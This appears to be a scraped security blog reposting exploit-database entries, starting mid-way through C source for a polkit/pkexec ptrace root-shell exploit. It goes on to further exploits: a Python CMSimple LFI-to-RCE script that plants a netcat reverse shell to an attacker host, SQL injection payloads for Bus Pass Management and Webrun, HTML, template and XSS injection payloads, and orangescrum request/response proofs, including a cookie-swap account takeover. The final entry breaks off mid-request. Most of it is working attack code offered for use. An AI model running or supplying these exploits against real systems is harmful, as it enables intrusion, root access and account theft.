"/usr/bin/xfpm-power-backlight-helper", "/usr/bin/lxqt-backlight_backend", "/usr/lib/gsd-backlight-helper", "/usr/lib/gsd-wacom-led-helper", "/usr/lib/gsd-wacom-oled-helper", "/usr/libexec/gsd-wacom-led-helper", "/usr/libexec/gsd-wacom-oled-helper", "/usr/libexec/gsd-backlight-helper", }; static int trace_align[2]; static const char *path_exec = "/usr/bin/pkexec"; static const char *path_action = "/usr/bin/pkaction"; static int fd = -1; static int pipe_stat; static const char *term_sh = "/bin/bash"; static int mid_succ = 1; static const char *path_doublealign; static char *tdisp(char *fmt, ...) { static char overlayfs[10000]; va_list ap; va_start(ap, fmt); vsprintf(overlayfs, fmt, ap); va_end(ap); return overlayfs; } static int middle_main(void *overlayfs) { prctl(PR_SET_PDEATHSIG, SIGKILL); pid_t middle = getpid(); fd = eff(open("/proc/_fd/exe", O_RDONLY)); pid_t child = eff(fork()); if (child == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL); eff(dup2(fd, 42)); int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY)); char *threadv = tdisp("\nUid:\t%d\t0\t", getuid()); eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); execl(path_exec, basename(path_exec), NULL); while (1) { char overlayfs[1000]; ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0)); overlayfs[buflen] = '\0'; if (strstr(overlayfs, threadv)) break; } dprintf("SUID execution failed."); exit(EXIT_FAILURE); } eff(dup2(fd, 0)); eff(dup2(trace_align[1], 1)); struct passwd *pw = getpwuid(getuid()); if (pw == NULL) { dprintf("err: username invalid/failed to fetch username"); exit(EXIT_FAILURE); } mid_succ = 1; execl(path_exec, basename(path_exec), "--user", pw->pw_name, path_doublealign, "--help", NULL); mid_succ = 0; dprintf("err: pkexec execution failed."); exit(EXIT_FAILURE); } static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) { struct user_regs_struct regs; struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) }; eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev)); unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL; struct injected_page { unsigned long inj_arse[2]; unsigned long environment[1]; char arg0[8]; char path[1]; } ipage = { .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) } }; strcpy(ipage.arg0, arg0); for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { unsigned long pro_d = ((unsigned long *)&ipage)[i]; eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long), (void*)pro_d)); } eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev)); eff(ptrace(PTRACE_DETACH, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); regs.orig_rax = __NR_execveat; regs.rdi = exec_fd; regs.rsi = inject_surface + offsetof(struct injected_page, path); regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse); regs.r10 = inject_surface + offsetof(struct injected_page, environment); regs.r8 = AT_EMPTY_PATH; } static int stag_2(void) { pid_t child = eff(waitpid(-1, &pipe_stat, 0)); timeexecbuffer(child, 42, "stage3"); return 0; } static int sh_spawn(void) { eff(setresgid(0, 0, 0)); eff(setresuid(0, 0, 0)); execlp(term_sh, basename(term_sh), NULL); dprintf("err: Shell spawn unsuccessful.", term_sh); exit(EXIT_FAILURE); } static int check_env(void) { const char* xdg_session = getenv("XDG_SESSION_ID"); dprintf("accessing variables...\n"); if (stat(path_action, &st) != 0) { dprintf("err: pkaction not found at %s.", path_action); exit(EXIT_FAILURE); } if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { dprintf("warn: PolKit agent not found.\n"); return 1; } if (stat("/usr/sbin/getsebool", &st) == 0) { if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { dprintf("warn: [deny_ptrace] is enabled.\n"); return 1; } } if (xdg_session == NULL) { dprintf("warn: $XDG_SESSION_ID is not set.\n"); return 1; } if (stat(path_exec, &st) != 0) { dprintf("err: pkexec not found at %s.", path_exec); exit(EXIT_FAILURE); } dprintf("execution has reached EOP.\n"); return 0; } int trunkh() { char cmd[1024]; snprintf(cmd, sizeof(cmd), "%s --verbose", path_action); FILE *fp; fp = popen(cmd, "r"); if (fp == NULL) { dprintf("err: Failed to run %s.\n", cmd); exit(EXIT_FAILURE); } char line[1024]; char buffer[2048]; int helper_index = 0; int useful_action = 0; static const char *threadv = "org.freedesktop.policykit.exec.path -> "; int needle_length = strlen(threadv); while (fgets(line, sizeof(line)-1, fp) != NULL) { if (strstr(line, "implicit active:")) { if (strstr(line, "yes")) { useful_action = 1; } continue; } if (useful_action == 0) continue; useful_action = 0; int length = strlen(line); char* found = memmem(&line[0], length, threadv, needle_length); if (found == NULL) continue; memset(buffer, 0, sizeof(buffer)); for (int i = 0; found[needle_length + i] != '\n'; i++) { if (i >= sizeof(buffer)-1) continue; buffer[i] = found[needle_length + i]; } if (stat(&buffer[0], &st) != 0) continue; if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || strstr(&buffer[0], "/cpugovctl") != 0 || strstr(&buffer[0], "/package-system-locked") != 0 || strstr(&buffer[0], "/cddistupgrader") != 0) { dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]); continue; } trunk[helper_index] = strndup(&buffer[0], strlen(buffer)); helper_index++; if (helper_index >= sizeof(trunk)/sizeof(trunk[0])) break; } pclose(fp); return 0; } int root_ptraceme() { dprintf("helper initiated: %s\n", path_doublealign); eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT)); eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000)); char overlayfs = 0; eff(write(trace_align[1], &overlayfs, 1)); dprintf("SUID process is being initiated(%s) ...\n", path_exec); static char stackv[1024*1024]; pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv), CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); if (!mid_succ) return 1; while (1) { int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY); char overlayfs[16]; int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1)); overlayfs[buflen] = '\0'; *strchrnul(overlayfs, '\n') = '\0'; if (strncmp(overlayfs, basename(path_doublealign), 15) == 0) break; usleep(100000); } dprintf("midpid is being traced...\n"); eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); eff(waitpid(midpid, &pipe_stat, 0)); dprintf("midpid attached.\n"); timeexecbuffer(midpid, 0, "stage2"); exit(EXIT_SUCCESS); } int main(int argc, char **inj_arse) { if (strcmp(inj_arse[0], "stage2") == 0) return stag_2(); if (strcmp(inj_arse[0], "stage3") == 0) return sh_spawn(); dprintf("Welcome to your Arsenal!\n"); check_env(); if (argc > 1 && strcmp(inj_arse[1], "check") == 0) { exit(0); } dprintf("efficient trunk is being searched...\n"); trunkh(); for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) { if (trunk[i] == NULL) break; if (stat(trunk[i], &st) == 0) { path_doublealign = trunk[i]; root_ptraceme(); } } dprintf("familiar trunks are been searched ...\n"); for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) { if (stat(trunks_rec[i], &st) == 0) { path_doublealign = trunks_rec[i]; dprintf("trunk helper found: %s\n", path_doublealign); root_ptraceme(); } } return 0; }
  13. HireHackking

    FLEX 1085 Web 1.6.0 - HTML Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection # Date: 2021-11-21 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android Title: ================ FLEX 1085 Web - HTML Injection Summary: ================ The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that allows the injection of arbitrary HTML code. Severity Level: ================ 5.3 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Vulnerability Disclosure Schedule: ============================ * October 19, 2021: An email was sent to support at 6:08MP. * November 20, 2021: I didn't get any response from support. * November 21, 2021: Vulnerability Disclosure Affected Product: ================ FLEX 1085 Web v1.6.0 Steps to Reproduce: ================ 1. Open your browser and search for your device's IP address (http://<IP>). 2. Log in to the device's dashboard and go to "WiFi". 3. Use another device that has an access point and create a Wi-Fi network called "<h1>HTML Injection</h1>" (no double quotes) and activate the access point. (https://prnt.sc/20e4y88) 4. Go back to the FLEX device and when scanning the new WiFi networks, the new network will appear written "HTML Injection" in bold and with a larger font size. (http://prnt.sc/20e51li)
  14. HireHackking

    Bus Pass Management System 1.0 - 'Search' SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection # Date: 23-11-2021 # Exploit Author: Abhijeet Singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/ # Version: v-1.0 (Default) # Tested on: macOS Monterey(Version 12.0.1) *SQL Injection:* SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. *Attack Vector:* An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap. *Steps to reproduce:* Step-1: Open 'View Pass' page using following URL: http://127.0.0.1/buspassms/download-pass.php 2. Now put the below payload in the 'Search' field. *Payload: *123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x 3. Server accepted our payload and the response got delayed by 4 seconds. *IMPACT:* As the vulnerable parameter is an external parameter (credentials not required), an attacker can dump the database of the application remotely. Suggested Mitigation/Remediation Actions Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.
  15. HireHackking

    Webrun 3.6.0.42 - 'P_0' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection # Google Dork: intitle:"Webrun 3.6.0.42" # Date: 23/11/2021 # Exploit Author: Vinicius Alves # Vendor Homepage: https://softwell.com.br/ # Version: 3.6.0.42 # Tested on: Kali Linux 2021.3 # CVE: CVE-2021-43650 =-=-=-= Description =-=-=-= Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process. =-=-=-= Exploiting =-=-=-= In the post request, change the P_0 value to the following payload: 121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd You will see some information like below: interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric: \"qvvxq1qbzbq\"', null, null, null, '<b> =-=-=-= POC =-=-=-= If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this. See an example of the complete POST parameter: action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
  16. HireHackking

    CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated) # Date: 11/15/2021 # Exploit Author: S1lv3r # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/ # Version: CMSimple 5.4 # Tested on: CMSimple 5.4 # writeup: # https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities #!/usr/bin/python3 import requests import threading import datetime import sys from bs4 import BeautifulSoup x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) Time = x + addSeconds proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",} def Login(): try: global Time s = requests.Session() headers= {"Content-Type": "application/x-www-form-urlencoded"} data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login' response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies if response.cookies['passwd']: print("(+) Sucessfully Logged In With " + User + ":" + Password) cookies = response.cookies params = (('file', 'config'),('action', 'array'),) response = s.get(RHOST ,cookies=cookies ,params=params,verify=False) soup = BeautifulSoup(response.text, 'lxml') CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value'] print("(+) Get CSRF Token : [ " + CsrfValue + " ]") data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save' response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False) print("(+) Changing Functions file Done ") print("(+) Check Your nc listner on " + LPORT) except Exception as error: print("Error, Exiting;( ") print(error) pass def fuzz(): while True: try: sessionName = "S1lv3r" cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS':(None, '<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'), 'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')} x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) CMSimple LFI to RCE \n") Login() threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) <= 5: print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) SiLvEr \n") exit() else: RHOST = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] User = sys.argv[4] Password = sys.argv[5] main()
  17. HireHackking

    HTTPDebuggerPro 9.11 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 23/11/2021 # Vendor Homepage: https://www.httpdebugger.com # Software Link: https://www.httpdebugger.com/download.html # Version: 9.11 # Tested on: Windows 10 x64 SERVICE_NAME: HTTPDebuggerPro TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HTTP Debugger Pro DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  18. HireHackking

    Bagisto 1.3.3 - Client-Side Template Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection # Date: 11-25-2021 # Exploit Author: Mohamed Abdellatif Jaber # Vendor Homepage: https://bagisto.com/en/ # Software Link: https://github.com/bagisto/bagisto # Version: v1.3.3 # Tested on: [windows | chrome | firefox ] Exploit :. 1- register an account and login your account 2- go to your profile and edit name , address 2- and put this payload {{constructor.constructor('alert(document.domain)')()}} 3- admin or any one view order or your profile will execute arbitrary JS-code . rf:https://portswigger.net/kb/issues/00200308_client-side-template-injection
  19. HireHackking

    orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example vuln parameters: * project_id * old_project_id * uuid * uniqid * projid * id * caseno ----------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- ## Example ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1' - error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 64 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 500 Internal Server Error Date: Sun, 28 Nov 2021 12:42:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Content-Length: 132182 Vary: User-Agent Expires: access 12 month Connection: close [...] ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1'' - not error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 66 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 12:51:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 0
  20. HireHackking

    orangescrum 1.8.0 - Privilege escalation (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilege escalation # The user must be assigned to the project with the account he wants to take over # The vulnerabilities in the application allow for: * Taking over any account with which the project is assigned ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1. Go to the dashboard 2. Go to the page source view 3. Find in source "var PUSERS" 4. Copy "uniq_id" victim 5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source 6. After refreshing the page, you are logged in to the victim's account
  21. HireHackking

    orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example XSS Reflected Param: projid ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/edit_reply HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 64 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script> ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:28:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Content-Length: 1114 Vary: User-Agent Expires: access 12 month Connection: close Content-Type: text/html; charset=UTF-8 <table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12"> <tr> <td> <textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12"> xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea> </td> </tr> <tr> <td align="right"> <div id="edit_btn5" class="fr"> <button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b [...] ## Example XSS Stored Example vuln paraMETERS: * CS_message * name * data[User][email] ----------------------------------------------------------------------------------------------------------------------- Param: CS_message ----------------------------------------------------------------------------------------------------------------------- Req 